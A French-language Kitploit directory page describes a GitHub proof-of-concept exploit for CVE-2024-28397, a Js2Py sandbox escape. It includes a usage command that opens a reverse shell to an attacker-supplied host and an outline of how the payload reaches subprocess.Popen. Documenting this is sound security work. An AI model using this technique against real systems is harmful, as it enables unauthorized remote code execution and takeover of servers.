Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-28397-Js2Py-RCE — Ce dépôt contient une preuve de concept (PoC) pour CVE-2024-28397, une vulnérabilité dans la bibliothèque js2py permettant une évasion de sandbox afin d'obtenir une exécution de code à distance. | Kitploit
Outils/GitHubGitHub/d3ltaformation/cve-2024-28397-js2py-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubd3ltaformation/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

Ce dépôt contient une preuve de concept (PoC) pour CVE-2024-28397, une vulnérabilité dans la bibliothèque js2py permettant une évasion de sandbox afin d'obtenir une exécution de code à distance.

Voir le dépôt
2il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-28397-Js2Py-RCE

Description

Ce dépôt contient une preuve de concept (PoC) basée sur Python pour CVE-2024-28397, une vulnérabilité d'évasion de sandbox dans l'interpréteur JavaScript Js2Py pour Python. Lorsque l'application cible évalue du code JS non fiable via Js2Py, un attaquant peut s'échapper de la sandbox et exécuter du code Python arbitraire. Cela peut être exploité pour obtenir une exécution de code à distance (RCE) et un shell inverse sur le système vulnérable.

Cet exploit s'inspire du projet CVE-2024-28397-js2py-Sandbox-Escape de Marven11.


Avertissement

Ce script est fourni à des fins éducatives et de tests d'intrusion autorisés uniquement. L'utilisation non autorisée de ce script contre des systèmes que vous ne possédez pas ou pour lesquels vous ne disposez pas d'une autorisation explicite de test est illégale et contraire à l'éthique. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce script.


À propos de la vulnérabilité

  • ID CVE : CVE-2024-28397
  • Composant : évasion de sandbox Js2Py
  • Impact : accès illimité au modèle d'objets de Python via __class__.__base__.__subclasses__, conduisant à une exécution de code arbitraire
  • Vecteur d'attaque : à distance (via une interface HTTP exposée qui évalue du JavaScript contrôlé par l'utilisateur)

Fonctionnalités

  • Distribution automatique de la charge utile du shell inverse via RCE Python
  • Exécution de commandes shell encodées en Base64 en ligne
  • Écouteur de shell inverse intégré avec stabilisation PTY de base
  • Formatage propre de la sortie
  • Léger et sans dépendances (sauf pour requests)

Prérequis

  • Python 3.x
  • Module requests (pip install requests)
  • Un système Linux (pour le shell inverse /dev/tcp)
  • Une cible exécutant une implémentation vulnérable de Js2Py

Utilisation

root@kitploit:~
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
  • --target : l'URL complète du point de terminaison de l'application web vulnérable
  • --lhost : votre adresse IP locale (utilisée pour le shell inverse)
  • --lport : votre port local pour recevoir le shell

Fonctionnement

  1. Le script prépare un shell inverse Bash, l'encode en Base64 et l'injecte dans une charge utile JavaScript.
  2. La charge utile JS parcourt l'arborescence des objets Python à l'aide de __class__.__base__.__subclasses__() pour trouver subprocess.Popen.
  3. Elle utilise Popen pour décoder et exécuter le shell.
  4. La machine de l'attaquant reçoit le shell inverse et le stabilise automatiquement.
Télécharger l’outil